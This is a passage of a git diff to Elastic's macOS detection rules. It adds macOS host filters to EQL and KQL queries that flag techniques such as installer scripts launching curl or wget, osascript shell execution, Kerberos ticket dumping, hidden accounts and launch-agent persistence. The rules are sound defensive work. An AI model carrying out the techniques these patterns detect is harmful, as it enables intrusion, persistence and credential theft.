["Elastic"] @@ -39,8 +39,8 @@ type = "eql" query = ''' sequence by host.id, user.id with maxspan=30s -[process where event.type == "start" and event.action == "exec" and process.parent.name : ("installer", "package_script_service") and process.name : ("bash", "sh", "zsh", "python", "osascript", "tclsh*")] -[network where event.type == "start" and process.name : ("curl", "osascript", "wget", "python")] +[process where host.os.type == "macos" and event.type == "start" and event.action == "exec" and process.parent.name : ("installer", "package_script_service") and process.name : ("bash", "sh", "zsh", "python", "osascript", "tclsh*")] +[network where host.os.type == "macos" and event.type == "start" and process.name : ("curl", "osascript", "wget", "python")] ''' diff --git a/rules/macos/execution_script_via_automator_workflows.toml b/rules/macos/execution_script_via_automator_workflows.toml index 87f0d06eb..dc1d974fa 100644 --- a/rules/macos/execution_script_via_automator_workflows.toml +++ b/rules/macos/execution_script_via_automator_workflows.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,8 +27,8 @@ type = "eql" query = ''' sequence by host.id with maxspan=30s - [process where event.type in ("start", "process_started") and process.name == "automator"] - [network where process.name:"com.apple.automator.runner"] + [process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name == "automator"] + [network where host.os.type == "macos" and process.name:"com.apple.automator.runner"] ''' diff --git a/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml b/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml index 2dfb201eb..904bf6e58 100644 --- a/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml +++ b/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,8 +29,8 @@ type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan=30s - [process where event.type == "start" and process.name == "osascript"] - [network where event.type != "end" and process.name == "osascript" and destination.ip != "::1" and + [process where host.os.type == "macos" and event.type == "start" and process.name == "osascript"] + [network where host.os.type == "macos" and event.type != "end" and process.name == "osascript" and destination.ip != "::1" and not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", diff --git a/rules/macos/execution_shell_execution_via_apple_scripting.toml b/rules/macos/execution_shell_execution_via_apple_scripting.toml index 88e998340..d31d72b9c 100644 --- a/rules/macos/execution_shell_execution_via_apple_scripting.toml +++ b/rules/macos/execution_shell_execution_via_apple_scripting.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,8 +29,8 @@ type = "eql" query = ''' sequence by host.id with maxspan=5s - [process where event.type in ("start", "process_started", "info") and process.name == "osascript"] by process.pid - [process where event.type in ("start", "process_started") and process.name == "sh" and process.args == "-c"] by process.parent.pid + [process where host.os.type == "macos" and event.type in ("start", "process_started", "info") and process.name == "osascript"] by process.pid + [process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name == "sh" and process.args == "-c"] by process.parent.pid ''' diff --git a/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml b/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml index 24ba5f00c..29f9874dc 100644 --- a/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml +++ b/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and +process where host.os.type == "macos" and event.type in ("start", "process_started") and process.parent.name:("Microsoft Word", "Microsoft PowerPoint", "Microsoft Excel") and process.name: ( diff --git a/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml b/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml index a252f7b89..e3242ebfa 100644 --- a/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml +++ b/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:start and +event.category:process and host.os.type:macos and event.type:start and process.args:("-action" and ("-kerberoast" or askhash or asktgs or asktgt or s4u or ("-ticket" and ptt) or (dump and (tickets or keytab)))) ''' diff --git a/rules/macos/lateral_movement_mounting_smb_share.toml b/rules/macos/lateral_movement_mounting_smb_share.toml index 51961d91b..ae500fd7f 100644 --- a/rules/macos/lateral_movement_mounting_smb_share.toml +++ b/rules/macos/lateral_movement_mounting_smb_share.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and +process where host.os.type == "macos" and event.type in ("start", "process_started") and ( process.name : "mount_smbfs" or (process.name : "open" and process.args : "smb://*") or diff --git a/rules/macos/lateral_movement_remote_ssh_login_enabled.toml b/rules/macos/lateral_movement_remote_ssh_login_enabled.toml index 174805aaa..355f6ed95 100644 --- a/rules/macos/lateral_movement_remote_ssh_login_enabled.toml +++ b/rules/macos/lateral_movement_remote_ssh_login_enabled.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:macos and event.type:(start or process_started) and process.name:systemsetup and process.args:("-setremotelogin" and on) and not process.parent.executable : /usr/local/jamf/bin/jamf diff --git a/rules/macos/lateral_movement_vpn_connection_attempt.toml b/rules/macos/lateral_movement_vpn_connection_attempt.toml index f2b8a09c1..4bac49ec9 100644 --- a/rules/macos/lateral_movement_vpn_connection_attempt.toml +++ b/rules/macos/lateral_movement_vpn_connection_attempt.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -34,7 +34,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and +process where host.os.type == "macos" and event.type in ("start", "process_started") and ( (process.name : "networksetup" and process.args : "-connectpppoeservice") or (process.name : "scutil" and process.args : "--nc" and process.args : "start") or diff --git a/rules/macos/persistence_account_creation_hide_at_logon.toml b/rules/macos/persistence_account_creation_hide_at_logon.toml index 29c6f16e6..91637f90a 100644 --- a/rules/macos/persistence_account_creation_hide_at_logon.toml +++ b/rules/macos/persistence_account_creation_hide_at_logon.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:macos and event.type:(start or process_started) and process.name:dscl and process.args:(IsHidden and create and (true or 1 or yes)) ''' diff --git a/rules/macos/persistence_creation_change_launch_agents_file.toml b/rules/macos/persistence_creation_change_launch_agents_file.toml index a1fa513f0..25a9794e9 100644 --- a/rules/macos/persistence_creation_change_launch_agents_file.toml +++ b/rules/macos/persistence_creation_change_launch_agents_file.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,10 +29,10 @@ type = "eql" query = ''' sequence by host.id with maxspan=1m - [file where event.type != "deletion" and + [file where host.os.type == "macos" and event.type != "deletion" and file.path : ("/System/Library/LaunchAgents/*", "/Library/LaunchAgents/*", "/Users/*/Library/LaunchAgents/*") ] - [process where event.type in ("start", "process_started") and process.name == "launchctl" and process.args == "load"] + [process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name == "launchctl" and process.args == "load"] ''' diff --git a/rules/macos/persistence_creation_hidden_login_item_osascript.toml b/rules/macos/persistence_creation_hidden_login_item_osascript.toml index 4bf445cbf..08a0bd51f 100644 --- a/rules/macos/persistence_creation_hidden_login_item_osascript.toml +++ b/rules/macos/persistence_creation_hidden_login_item_osascript.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and process.name : "osascript" and +process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name : "osascript" and process.command_line : "osascript*login item*hidden:true*" ''' diff --git a/rules/macos/persistence_creation_modif_launch_deamon_sequence.toml b/rules/macos/persistence_creation_modif_launch_deamon_sequence.toml index 61801657a..8c68b7350 100644 --- a/rules/macos/persistence_creation_modif_launch_deamon_sequence.toml +++ b/rules/macos/persistence_creation_modif_launch_deamon_sequence.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,8 +29,8 @@ type = "eql" query = ''' sequence by host.id with maxspan=1m - [file where event.type != "deletion" and file.path : ("/System/Library/LaunchDaemons/*", "/Library/LaunchDaemons/*")] - [process where event.type in ("start", "process_started") and process.name == "launchctl" and process.args == "load"] + [file where host.os.type == "macos" and event.type != "deletion" and file.path : ("/System/Library/LaunchDaemons/*", "/Library/LaunchDaemons/*")] + [process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name == "launchctl" and process.args == "load"] ''' diff --git a/rules/macos/persistence_credential_access_authorization_plugin_creation.toml b/rules/macos/persistence_credential_access_authorization_plugin_creation.toml index 074ab73f5..7c6c6505f 100644 --- a/rules/macos/persistence_credential_access_authorization_plugin_creation.toml +++ b/rules/macos/persistence_credential_access_authorization_plugin_creation.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:file and not event.type:deletion and +event.category:file and host.os.type:macos and not event.type:deletion and file.path:(/Library/Security/SecurityAgentPlugins/* and not /Library/Security/SecurityAgentPlugins/TeamViewerAuthPlugin.bundle/*) and not process.name:shove and process.code_signature.trusted:true diff --git a/rules/macos/persistence_crontab_creation.toml b/rules/macos/persistence_crontab_creation.toml index f5fdd41fe..f1e931f5e 100644 --- a/rules/macos/persistence_crontab_creation.toml +++ b/rules/macos/persistence_crontab_creation.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type != "deletion" and process.name != null and +file where host.os.type == "macos" and event.type != "deletion" and process.name != null and file.path : "/private/var/at/tabs/*" and not process.executable == "/usr/bin/crontab" ''' diff --git a/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml b/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml index c6405ec4d..02f62bd67 100644 --- a/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml +++ b/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:macos and event.type:(start or process_started) and process.name:.* and process.parent.executable:/sbin/launchd ''' diff --git a/rules/macos/persistence_directory_services_plugins_modification.toml b/rules/macos/persistence_directory_services_plugins_modification.toml index f58ad4389..541014d24 100644 --- a/rules/macos/persistence_directory_services_plugins_modification.toml +++ b/rules/macos/persistence_directory_services_plugins_modification.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:file and not event.type:deletion and +event.category:file and host.os.type:macos and not event.type:deletion and file.path:/Library/DirectoryServices/PlugIns/*.dsplug ''' diff --git a/rules/macos/persistence_docker_shortcuts_plist_modification.toml b/rules/macos/persistence_docker_shortcuts_plist_modification.toml index 749ab0d86..a49e9bcee 100644 --- a/rules/macos/persistence_docker_shortcuts_plist_modification.toml +++ b/rules/macos/persistence_docker_shortcuts_plist_modification.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -28,9 +28,9 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category : file and event.action : modification and - file.path : /Users/*/Library/Preferences/com.apple.dock.plist and - not process.name : (xpcproxy or cfprefsd or plutil or jamf or PlistBuddy or InstallerRemotePluginService) +event.category:file and host.os.type:macos and event.action:modification and + file.path:/Users/*/Library/Preferences/com.apple.dock.plist and + not process.name:(xpcproxy or cfprefsd or plutil or jamf or PlistBuddy or InstallerRemotePluginService) ''' diff --git a/rules/macos/persistence_emond_rules_file_creation.toml b/rules/macos/persistence_emond_rules_file_creation.toml index 6dbbc7335..1c92f9e8c 100644 --- a/rules/macos/persistence_emond_rules_file_creation.toml +++ b/rules/macos/persistence_emond_rules_file_creation.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -33,7 +33,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type != "deletion" and +file where host.os.type == "macos" and event.type != "deletion" and file.path : ("/private/etc/emond.d/rules/*.plist", "/etc/emon.d/rules/*.plist", "/private/var/db/emondClients/*") ''' diff --git a/rules/macos/persistence_emond_rules_process_execution.toml b/rules/macos/persistence_emond_rules_process_execution.toml index 1782d3b9d..0c3ca76be 100644 --- a/rules/macos/persistence_emond_rules_process_execution.toml +++ b/rules/macos/persistence_emond_rules_process_execution.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and +process where host.os.type == "macos" and event.type in ("start", "process_started") and process.parent.name : "emond" and process.name : ( "bash", diff --git a/rules/macos/persistence_enable_root_account.toml b/rules/macos/persistence_enable_root_account.toml index 4a88b411b..705bf9c64 100644 --- a/rules/macos/persistence_enable_root_account.toml +++ b/rules/macos/persistence_enable_root_account.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:macos and event.type:(start or process_started) and process.name:dsenableroot and not process.args:"-d" ''' diff --git a/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml b/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml index 19e364367..8760f3cb1 100644 --- a/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml +++ b/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,7 +32,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type != "deletion" and +file where host.os.type == "macos" and event.type != "deletion" and file.path : ( "/System/Library/LaunchAgents/.*.plist", diff --git a/rules/macos/persistence_finder_sync_plugin_pluginkit.toml b/rules/macos/persistence_finder_sync_plugin_pluginkit.toml index 0f0d13a49..a8287867c 100644 --- a/rules/macos/persistence_finder_sync_plugin_pluginkit.toml +++ b/rules/macos/persistence_finder_sync_plugin_pluginkit.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and process.name : "pluginkit" and +process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name : "pluginkit" and process.args : "-e" and process.args : "use" and process.args : "-i" and not process.args : ( diff --git a/rules/macos/persistence_folder_action_scripts_runtime.toml b/rules/macos/persistence_folder_action_scripts_runtime.toml index f75a11f35..382b9eeba 100644 --- a/rules/macos/persistence_folder_action_scripts_runtime.toml +++ b/rules/macos/persistence_folder_action_scripts_runtime.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,8 +27,8 @@ type = "eql" query = ''' sequence by host.id with maxspan=5s - [process where event.type in ("start", "process_started", "info") and process.name == "com.apple.foundation.UserScriptService"] by process.pid - [process where event.type in ("start", "process_started") and process.name in ("osascript", "python", "tcl", "node", "perl", "ruby", "php", "bash", "csh", "zsh", "sh") and + [process where host.os.type == "macos" and event.type in ("start", "process_started", "info") and process.name == "com.apple.foundation.UserScriptService"] by process.pid + [process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name in ("osascript", "python", "tcl", "node", "perl", "ruby", "php", "bash", "csh", "zsh", "sh") and not process.args : "/Users/*/Library/Application Support/iTerm2/Scripts/AutoLaunch/*.scpt" ] by process.parent.pid ''' diff --git a/rules/macos/persistence_login_logout_hooks_defaults.toml b/rules/macos/persistence_login_logout_hooks_defaults.toml index 417e9de11..f25aef2ea 100644 --- a/rules/macos/persistence_login_logout_hooks_defaults.toml +++ b/rules/macos/persistence_login_logout_hooks_defaults.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -33,8 +33,8 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and - process.name == "defaults" and process.args == "write" and process.args in ("LoginHook", "LogoutHook") and +process where host.os.type == "macos" and event.type == "start" and + process.name == "defaults" and process.args == "write" and process.args : ("LoginHook", "LogoutHook") and not process.args : ( "Support/JAMF/ManagementFrameworkScripts/logouthook.sh", diff --git a/rules/macos/persistence_loginwindow_plist_modification.toml b/rules/macos/persistence_loginwindow_plist_modification.toml index e70735165..48bc130a1 100644 --- a/rules/macos/persistence_loginwindow_plist_modification.toml +++ b/rules/macos/persistence_loginwindow_plist_modification.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:"file" and not event.type:"deletion" and +event.category:file and host.os.type:macos and not event.type:"deletion" and file.name:"com.apple.loginwindow.plist" and process.name:(* and not (systemmigrationd or DesktopServicesHelper or diskmanagementd or rsync or launchd or cfprefsd or xpcproxy or ManagedClient or MCXCompositor or backupd or "iMazing Profile Editor" )) diff --git a/rules/macos/persistence_modification_sublime_app_plugin_or_script.toml b/rules/macos/persistence_modification_sublime_app_plugin_or_script.toml index 3b0f2b8fe..d4ad1db2a 100644 --- a/rules/macos/persistence_modification_sublime_app_plugin_or_script.toml +++ b/rules/macos/persistence_modification_sublime_app_plugin_or_script.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type in ("change", "creation") and file.extension : "py" and +file where host.os.type == "macos" and event.type in ("change", "creation") and file.extension : "py" and file.path : ( "/Users/*/Library/Application Support/Sublime Text*/Packages/*.py", diff --git a/rules/macos/persistence_periodic_tasks_file_mdofiy.toml b/rules/macos/persistence_periodic_tasks_file_mdofiy.toml index 1f8c215d3..5c1c6ae3f 100644 --- a/rules/macos/persistence_periodic_tasks_file_mdofiy.toml +++ b/rules/macos/persistence_periodic_tasks_file_mdofiy.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:"file" and not event.type:"deletion" and +event.category:file and host.os.type:macos and not event.type:"deletion" and file.path:(/private/etc/periodic/* or /private/etc/defaults/periodic.conf or /private/etc/periodic.conf) ''' diff --git a/rules/macos/persistence_screensaver_engine_unexpected_child_process.toml b/rules/macos/persistence_screensaver_engine_unexpected_child_process.toml index 5629a2f39..6972af776 100644 --- a/rules/macos/persistence_screensaver_engine_unexpected_child_process.toml +++ b/rules/macos/persistence_screensaver_engine_unexpected_child_process.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -43,7 +43,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and process.parent.name == "ScreenSaverEngine" +process where host.os.type == "macos" and event.type == "start" and process.parent.name == "ScreenSaverEngine" ''' diff --git a/rules/macos/persistence_screensaver_plist_file_modification.toml b/rules/macos/persistence_screensaver_plist_file_modification.toml index 803351d6d..a38ae8f38 100644 --- a/rules/macos/persistence_screensaver_plist_file_modification.toml +++ b/rules/macos/persistence_screensaver_plist_file_modification.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -40,7 +40,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type != "deletion" and +file where host.os.type == "macos" and event.type != "deletion" and file.name: "com.apple.screensaver.*.plist" and file.path : ( "/Users/*/Library/Preferences/ByHost/*", diff --git a/rules/macos/persistence_suspicious_calendar_modification.toml b/rules/macos/persistence_suspicious_calendar_modification.toml index 78d519343..ddccd67ae 100644 --- a/rules/macos/persistence_suspicious_calendar_modification.toml +++ b/rules/macos/persistence_suspicious_calendar_modification.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -31,7 +31,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:file and event.action:modification and +event.category:file and host.os.type:macos and event.action:modification and file.path:/Users/*/Library/Calendars/*.calendar/Events/*.ics and process.executable: (* and not diff --git a/rules/macos/persistence_via_atom_init_file_modification.toml b/rules/macos/persistence_via_atom_init_file_modification.toml index 9b8667ddf..c51fa7c4b 100644 --- a/rules/macos/persistence_via_atom_init_file_modification.toml +++ b/rules/macos/persistence_via_atom_init_file_modification.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:"file" and not event.type:"deletion" and +event.category:file and host.os.type:macos and not event.type:"deletion" and file.path:/Users/*/.atom/init.coffee and not process.name:(Atom or xpcproxy) and not user.name:root ''' diff --git a/rules/macos/privilege_escalation_applescript_with_admin_privs.toml b/rules/macos/privilege_escalation_applescript_with_admin_privs.toml index cadcca664..ef8121471 100644 --- a/rules/macos/privilege_escalation_applescript_with_admin_privs.toml +++ b/rules/macos/privilege_escalation_applescript_with_admin_privs.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and process.name : "osascript" and +process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name : "osascript" and process.command_line : "osascript*with administrator privileges" ''' diff --git a/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml b/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml index b6aa94e86..7160b85e2 100644 --- a/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml +++ b/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:macos and event.type:(start or process_started) and process.name:"security_authtrampoline" and process.parent.name:(osascript or com.apple.automator.runner or sh or bash or dash or zsh or python* or Python or perl* or php* or ruby or pwsh) ''' diff --git a/rules/macos/privilege_escalation_exploit_adobe_acrobat_updater.toml b/rules/macos/privilege_escalation_exploit_adobe_acrobat_updater.toml index 8de6c64de..029802577 100644 --- a/rules/macos/privilege_escalation_exploit_adobe_acrobat_updater.toml +++ b/rules/macos/privilege_escalation_exploit_adobe_acrobat_updater.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -39,7 +39,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:macos and event.type:(start or process_started) and process.parent.name:com.adobe.ARMDC.SMJobBlessHelper and user.name:root and not process.executable: (/Library/PrivilegedHelperTools/com.adobe.ARMDC.SMJobBlessHelper or diff --git a/rules/macos/privilege_escalation_local_user_added_to_admin.toml b/rules/macos/privilege_escalation_local_user_added_to_admin.toml index 81d5fc0e4..a77ec46a8 100644 --- a/rules/macos/privilege_escalation_local_user_added_to_admin.toml +++ b/rules/macos/privilege_escalation_local_user_added_to_admin.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and 